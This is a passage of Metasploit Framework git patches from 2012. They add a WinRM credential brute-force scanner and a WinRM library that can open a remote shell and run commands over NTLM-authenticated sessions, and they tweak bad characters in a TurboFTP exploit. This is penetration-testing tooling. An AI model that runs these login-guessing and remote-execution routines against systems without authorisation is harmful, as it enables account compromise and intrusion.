'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' From 2f0c2d76eacf8c8e3ba64904f1b7a68891fa1839 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 11:01:26 +0200 Subject: [PATCH 51/74] remove load statements --- modules/post/multi/escalate/metasploit_pcaplog.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 8502b2e075..64cdea7f19 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -13,11 +13,6 @@ require 'msf/core/post/linux/priv' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' -load 'lib/msf/core/post/common.rb' -load 'lib/msf/core/post/file.rb' -load 'lib/msf/core/exploit/local/unix.rb' -load 'lib/msf/core/exploit/local/linux.rb' - class Metasploit3 < Msf::Post Rank = ManualRanking From a15c35091d69e675818ab10dd54d1728668d2f41 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 24 Oct 2012 11:25:39 -0500 Subject: [PATCH 52/74] Add the WinRM login module --- lib/msf/core/exploit/winrm.rb | 4 - .../auxiliary/scanner/winrm/winrm_login.rb | 83 +++++++++++++++++++ 2 files changed, 83 insertions(+), 4 deletions(-) create mode 100644 modules/auxiliary/scanner/winrm/winrm_login.rb diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 90eb4f2053..ff4e6e5e30 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -20,11 +20,7 @@ module Msf super register_options( [ - Opt::RHOST, Opt::RPORT(5985), - OptString.new('VHOST', [ false, "HTTP server virtual host" ]), - OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']), OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]), OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]), diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb new file mode 100644 index 0000000000..ca9c8c74af --- /dev/null +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -0,0 +1,83 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' +require 'rex/proto/ntlm/message' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::WinRM + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'WinRM Login Utility', + 'Version' => '$Revision$', + 'Description' => %q{ + This module attempts to authenticate to a WinRM service. It currently + works only if the remote end allows Negotiate(NTLM) authentication. + Kerberos is not currently supported. + }, + 'References' => + [ + + ], + 'Author' => [ 'thelightcosine' ], + 'References' => + [ + [ 'CVE', '1999-0502'] # Weak password + ], + 'License' => MSF_LICENSE + ) + + end + + + def run_host(ip) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end + each_user_pass do |user, pass| + resp,c = send_request_ntlm(test_request) + if resp.nil? + print_error "Got no reply from the server, connection may have timed out" + return + elsif resp.code == 200 + cred_hash = { + :host => ip, + :port => rport, + :sname => 'winrm', + :pass => pass, + :user => user, + :source_type => "user_supplied", + :active => true + } + report_auth_info(cred_hash) + print_good "Valid credential found: #{user}:#{pass}" + elsif resp.code == 401 + print_error "Login failed: #{user}:#{pass}" + else + print_error "Recieved unexpected Response Code: #{resp.code}" + end + end + end + + + def test_request + data = winrm_wql_msg("Select Name,Status from Win32_Service") + end + +end From b48e355a6d5a474896aceea18a958365ff5ce62c Mon Sep 17 00:00:00 2001 From: corelanc0d3r Date: Wed, 24 Oct 2012 20:04:54 +0200 Subject: [PATCH 53/74] fixed typo and defined badchars --- modules/exploits/windows/ftp/turboftp_port.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb index 1e71610e63..12e5870827 100644 --- a/modules/exploits/windows/ftp/turboftp_port.rb +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ - 'Zhao Liang', #Initial Descovery + 'Zhao Liang', #Initial Discovery 'Lincoln', #Metasploit 'corelanc0d3r', #Metasploit 'thelightcosine' #Metasploit @@ -36,9 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Payload' => { - 'BadChars' => "\x00", - 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, - 'EncoderOptions' => { 'BufferRegister' => 'EDI' } + 'BadChars' => "\x00\x0a\x0d\x20", }, 'Targets' => [ From 1dcbbdf16206a42cf53b6ccee03e1e6ac9d68ebd Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 24 Oct 2012 13:50:44 -0500 Subject: [PATCH 54/74] changed indent level --- lib/msf/core/exploit/winrm.rb | 802 +++++++++++++++++----------------- 1 file changed, 401 insertions(+), 401 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index ff4e6e5e30..3e96261348 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -6,418 +6,418 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' module Msf - module Exploit::Remote::WinRM - include Exploit::Remote::NTLM::Client - include Exploit::Remote::HttpClient - # - # Constants - # - NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt - NTLM_CONST ||= Rex::Proto::NTLM::Constants - NTLM_UTILS ||= Rex::Proto::NTLM::Utils - NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions - def initialize(info = {}) - super - register_options( - [ - Opt::RPORT(5985), - OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']), - OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]), - OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]), - OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]), - ], self.class - ) +module Exploit::Remote::WinRM + include Exploit::Remote::NTLM::Client + include Exploit::Remote::HttpClient + # + # Constants + # + NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt + NTLM_CONST ||= Rex::Proto::NTLM::Constants + NTLM_UTILS ||= Rex::Proto::NTLM::Utils + NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions + def initialize(info = {}) + super + register_options( + [ + Opt::RPORT(5985), + OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']), + OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]), + OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]), + OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]), + ], self.class + ) - register_autofilter_ports([ 80,443,5985,5986 ]) - register_autofilter_services(%W{ winrm }) + register_autofilter_ports([ 80,443,5985,5986 ]) + register_autofilter_services(%W{ winrm }) + end + + def winrm_poke(timeout = 20) + opts = { + 'uri' => datastore['URI'], + 'data' => Rex::Text.rand_text_alpha(8) + } + c = connect(opts) + to = opts[:timeout] || timeout + ctype = "application/soap+xml;charset=UTF-8" + resp, c = send_request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'POST', + 'ctype' => ctype, + 'data' => opts['data'] + }), to) + return resp + end + + def parse_auth_methods(resp) + return [] unless resp and resp.code == 401 + methods = [] + methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate" + methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos" + methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic" + return methods + end + + def winrm_run_cmd(cmd, timeout=20) + resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + if resp.code == 401 + print_error "Login failure! Recheck supplied credentials." + return resp .code end + unless resp.code == 200 + print_error "Got unexpected response: \n #{resp.to_s}" + retval == resp.code || 0 + return retval + end + shell_id = winrm_get_shell_id(resp) + resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + cmd_id = winrm_get_cmd_id(resp) + resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + streams = winrm_get_cmd_streams(resp) + resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) + return streams + end - def winrm_poke(timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => Rex::Text.rand_text_alpha(8) - } + def winrm_wql_msg(wql) + action = winrm_uri_action("wql") + contents = winrm_header(action) + winrm_wql_body(wql) + msg = winrm_envelope(contents) + return msg + end + + def winrm_open_shell_msg + action = winrm_uri_action("create_shell") + options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']]) + header_data = action + options + contents = winrm_header(header_data) + winrm_open_shell_body + msg = winrm_envelope(contents) + return msg + end + + def winrm_cmd_msg(cmd,shell_id) + action = winrm_uri_action("send_cmd") + options = winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']]) + selectors = winrm_selector_set([['ShellId', shell_id]]) + header_data = action + options + selectors + contents = winrm_header(header_data) + winrm_cmd_body(cmd) + msg = winrm_envelope(contents) + return msg + end + + def winrm_cmd_recv_msg(shell_id,cmd_id) + action = winrm_uri_action("recv_cmd") + selectors = winrm_selector_set([['ShellId', shell_id]]) + header_data = action + selectors + contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id) + msg = winrm_envelope(contents) + return msg + end + + def winrm_terminate_cmd_msg(shell_id,cmd_id) + action = winrm_uri_action("signal_shell") + selectors = winrm_selector_set([['ShellId', shell_id]]) + header_data = action + selectors + contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id) + msg = winrm_envelope(contents) + return msg + end + + def winrm_delete_shell_msg(shell_id) + action = winrm_uri_action("delete_shell") + selectors = winrm_selector_set([['ShellId', shell_id]]) + header_data = action + selectors + contents = winrm_header(header_data) + winrm_empty_body + msg = winrm_envelope(contents) + return msg + end + + def parse_wql_response(response) + xml = response.body + columns = [] + rows =[] + rxml = REXML::Document.new(xml).root + items = rxml.elements["///w:Items"] + items.elements.to_a("///w:XmlFragment").each do |node| + row_data = [] + node.elements.to_a.each do |sub_node| + columns << sub_node.name + row_data << sub_node.text + end + rows << row_data + end + columns.uniq! + response_data = Rex::Ui::Text::Table.new( + 'Header' => "#{datastore['WQL']} (#{rhost})", + 'Indent' => 1, + 'Columns' => columns + ) + rows.each do |row| + response_data << row + end + return response_data + end + + def winrm_get_shell_id(response) + xml = response.body + shell_id = REXML::Document.new(xml).elements["//w:Selector"].text + end + + def winrm_get_cmd_id(response) + xml = response.body + cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text + end + + def winrm_get_cmd_streams(response) + streams = { + 'stdout' => '', + 'stderr' => '', + } + xml = response.body + rxml = REXML::Document.new(xml).root + rxml.elements.to_a("//rsp:Stream").each do |node| + next if node.text.nil? + streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text) + end + return streams + end + + def generate_uuid + ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) + end + + def send_request_ntlm(data, timeout = 20) + opts = { + 'uri' => datastore['URI'], + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, + workstation_name, + ntlmssp_flags)) + to = opts[:timeout] || timeout + begin c = connect(opts) - to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_request_cgi(opts.merge({ + # First request to get the challenge + r = c.request_cgi(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, + 'headers' => { 'Authorization' => ntlm_message_1}, 'data' => opts['data'] - }), to) - return resp - end - - def parse_auth_methods(resp) - return [] unless resp and resp.code == 401 - methods = [] - methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate" - methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos" - methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic" - return methods - end - - def winrm_run_cmd(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) - if resp.code == 401 - print_error "Login failure! Recheck supplied credentials." - return resp .code + })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] end - unless resp.code == 200 - print_error "Got unexpected response: \n #{resp.to_s}" - retval == resp.code || 0 - return retval + return [nil,nil] if resp.code == 404 + return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] + return [nil,nil] unless ntlm_challenge + + #old and simplier method but not compatible with windows 7/2008r2 + #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) + #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + #netbios name + default_name = blob_data[:default_name] || '' + #netbios domain + default_domain = blob_data[:default_domain] || '' + #dns name + dns_host_name = blob_data[:dns_host_name] || '' + #dns domain + dns_domain_name = blob_data[:dns_domain_name] || '' + #Client time + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + resp_lm, + resp_ntlm, + client_challenge, + ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, + domain_name, default_name, default_domain, + dns_host_name, dns_domain_name, chall_MsvAvTimestamp, + spnopt, ntlm_options) + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], + resp_lm, resp_ntlm, '', ntlmssp_flags) + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + # Send the response + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'POST', + 'ctype' => ctype, + 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, + 'data' => opts['data'] + })) + resp = c.send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] end - shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) - cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) - streams = winrm_get_cmd_streams(resp) - resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) - return streams + return [nil,nil] if resp.code == 404 + return [resp,c] + rescue ::Errno::EPIPE, ::Timeout::Error end - - def winrm_wql_msg(wql) - action = winrm_uri_action("wql") - contents = winrm_header(action) + winrm_wql_body(wql) - msg = winrm_envelope(contents) - return msg - end - - def winrm_open_shell_msg - action = winrm_uri_action("create_shell") - options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']]) - header_data = action + options - contents = winrm_header(header_data) + winrm_open_shell_body - msg = winrm_envelope(contents) - return msg - end - - def winrm_cmd_msg(cmd,shell_id) - action = winrm_uri_action("send_cmd") - options = winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']]) - selectors = winrm_selector_set([['ShellId', shell_id]]) - header_data = action + options + selectors - contents = winrm_header(header_data) + winrm_cmd_body(cmd) - msg = winrm_envelope(contents) - return msg - end - - def winrm_cmd_recv_msg(shell_id,cmd_id) - action = winrm_uri_action("recv_cmd") - selectors = winrm_selector_set([['ShellId', shell_id]]) - header_data = action + selectors - contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id) - msg = winrm_envelope(contents) - return msg - end - - def winrm_terminate_cmd_msg(shell_id,cmd_id) - action = winrm_uri_action("signal_shell") - selectors = winrm_selector_set([['ShellId', shell_id]]) - header_data = action + selectors - contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id) - msg = winrm_envelope(contents) - return msg - end - - def winrm_delete_shell_msg(shell_id) - action = winrm_uri_action("delete_shell") - selectors = winrm_selector_set([['ShellId', shell_id]]) - header_data = action + selectors - contents = winrm_header(header_data) + winrm_empty_body - msg = winrm_envelope(contents) - return msg - end - - def parse_wql_response(response) - xml = response.body - columns = [] - rows =[] - rxml = REXML::Document.new(xml).root - items = rxml.elements["///w:Items"] - items.elements.to_a("///w:XmlFragment").each do |node| - row_data = [] - node.elements.to_a.each do |sub_node| - columns << sub_node.name - row_data << sub_node.text - end - rows << row_data - end - columns.uniq! - response_data = Rex::Ui::Text::Table.new( - 'Header' => "#{datastore['WQL']} (#{rhost})", - 'Indent' => 1, - 'Columns' => columns - ) - rows.each do |row| - response_data << row - end - return response_data - end - - def winrm_get_shell_id(response) - xml = response.body - shell_id = REXML::Document.new(xml).elements["//w:Selector"].text - end - - def winrm_get_cmd_id(response) - xml = response.body - cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text - end - - def winrm_get_cmd_streams(response) - streams = { - 'stdout' => '', - 'stderr' => '', - } - xml = response.body - rxml = REXML::Document.new(xml).root - rxml.elements.to_a("//rsp:Stream").each do |node| - next if node.text.nil? - streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text) - end - return streams - end - - def generate_uuid - ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) - end - - def send_request_ntlm(data, timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - } - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - ctype = "application/soap+xml;charset=UTF-8" - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => ntlm_message_1}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - def accepts_ntlm_auth - parse_auth_methods(winrm_poke).include? "Negotiate" - end - - def target_url - proto = "http" - if rport == 5986 or datastore['SSL'] - proto = "https" - end - if datastore['VHOST'] - return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}" - else - return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}" - end - end - - private - - def winrm_option_set(options) - xml = "" - options.each do |option_pair| - xml << winrm_option(*option_pair) - end - xml << "" - return xml - end - - def winrm_option(name,value) - %Q{#{value}} - end - - def winrm_selector_set(selectors) - xml = "" - selectors.each do |selector_pair| - xml << winrm_selector(*selector_pair) - end - xml << "" - return xml - end - - def winrm_selector(name,value) - %Q{#{value}} - end - - def winrm_wql_body(wql) - %Q{ - - - - 32000 - #{wql} - - - } - end - - def winrm_open_shell_body - %q{ - - stdin - stdout stderr - - } - end - - def winrm_cmd_body(cmd) - %Q{ - - "#{cmd}" - - } - end - - def winrm_cmd_recv_body(cmd_id) - %Q{ - - stdout stderr - - } - end - - def winrm_terminate_cmd_body(cmd_id) - %Q{ - - http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate - - } - end - - def winrm_empty_body - %q{} - end - - def winrm_envelope(data) - %Q{ - - #{data} - } - end - - def winrm_header(data) - %Q{ - - #{target_url} - - http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous - - 153600 - uuid:#{generate_uuid} - - - PT60S - #{data} - - } - end - - def winrm_uri_action(type) - case type - when "wql" - return %q{http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/* - http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate} - when "create_shell" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.xmlsoap.org/ws/2004/09/transfer/Create} - when "send_cmd" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command} - when "recv_cmd" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive} - when "signal_shell" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal} - when "delete_shell" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete} - end - end - end + + def accepts_ntlm_auth + parse_auth_methods(winrm_poke).include? "Negotiate" + end + + def target_url + proto = "http" + if rport == 5986 or datastore['SSL'] + proto = "https" + end + if datastore['VHOST'] + return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}" + else + return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}" + end + end + + private + + def winrm_option_set(options) + xml = "" + options.each do |option_pair| + xml << winrm_option(*option_pair) + end + xml << "" + return xml + end + + def winrm_option(name,value) + %Q{#{value}} + end + + def winrm_selector_set(selectors) + xml = "" + selectors.each do |selector_pair| + xml << winrm_selector(*selector_pair) + end + xml << "" + return xml + end + + def winrm_selector(name,value) + %Q{#{value}} + end + + def winrm_wql_body(wql) + %Q{ + + + + 32000 + #{wql} + + + } + end + + def winrm_open_shell_body + %q{ + + stdin + stdout stderr + + } + end + + def winrm_cmd_body(cmd) + %Q{ + + "#{cmd}" + + } + end + + def winrm_cmd_recv_body(cmd_id) + %Q{ + + stdout stderr + + } + end + + def winrm_terminate_cmd_body(cmd_id) + %Q{ + + http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate + + } + end + + def winrm_empty_body + %q{} + end + + def winrm_envelope(data) + %Q{ + + #{data} + } + end + + def winrm_header(data) + %Q{ + + #{target_url} + + http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous + + 153600 + uuid:#{generate_uuid} + + + PT60S + #{data} + + } + end + + def winrm_uri_action(type) + case type + when "wql" + return %q{http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/* + http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate} + when "create_shell" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.xmlsoap.org/ws/2004/09/transfer/Create} + when "send_cmd" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command} + when "recv_cmd" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive} + when "signal_shell" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal} + when "delete_shell" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete} + end + end + +end end From fb7af536d5f66d3f4d4cbed25e66faa8944877f9 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 25 Oct 2012 10:16:12 -0500 Subject: [PATCH 55/74] wtf, bad metadata Removed extraneous references section --- modules/auxiliary/scanner/winrm/winrm_login.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index ca9c8c74af..34a16f8682 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -30,10 +30,6 @@ class Metasploit3 < Msf::Auxiliary works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. }, - 'References' => - [ - - ], 'Author' => [ 'thelightcosine' ], 'References' => [ From b15c38f81969a6774462668f44fea29158e72a88 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 25 Oct 2012 19:57:29 -0500 Subject: [PATCH 56/74] Fix output to display ip:port --- modules/auxiliary/scanner/winrm/winrm_auth_methods.rb | 6 +++--- modules/auxiliary/scanner/winrm/winrm_login.rb | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index 910fe06ff2..d0b583a549 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -52,9 +52,9 @@ class Metasploit3 < Msf::Auxiliary :name => 'winrm', :info => desc ) - print_good "Negotiate protocol supported" if methods.include? "Negotiate" - print_good "Kerberos protocol supported" if methods.include? "Kerberos" - print_good "Basic protocol supported" if methods.include? "Basic" + print_good "#{ip}:#{rport}: Negotiate protocol supported" if methods.include? "Negotiate" + print_good "#{ip}:#{rport}: Kerberos protocol supported" if methods.include? "Kerberos" + print_good "#{ip}:#{rport}: Basic protocol supported" if methods.include? "Basic" else print_error "#{ip}:#{rport} Does not appear to be a WinRM server" end diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 34a16f8682..198bdd83d6 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary each_user_pass do |user, pass| resp,c = send_request_ntlm(test_request) if resp.nil? - print_error "Got no reply from the server, connection may have timed out" + print_error "#{ip}:#{rport}: Got no reply from the server, connection may have 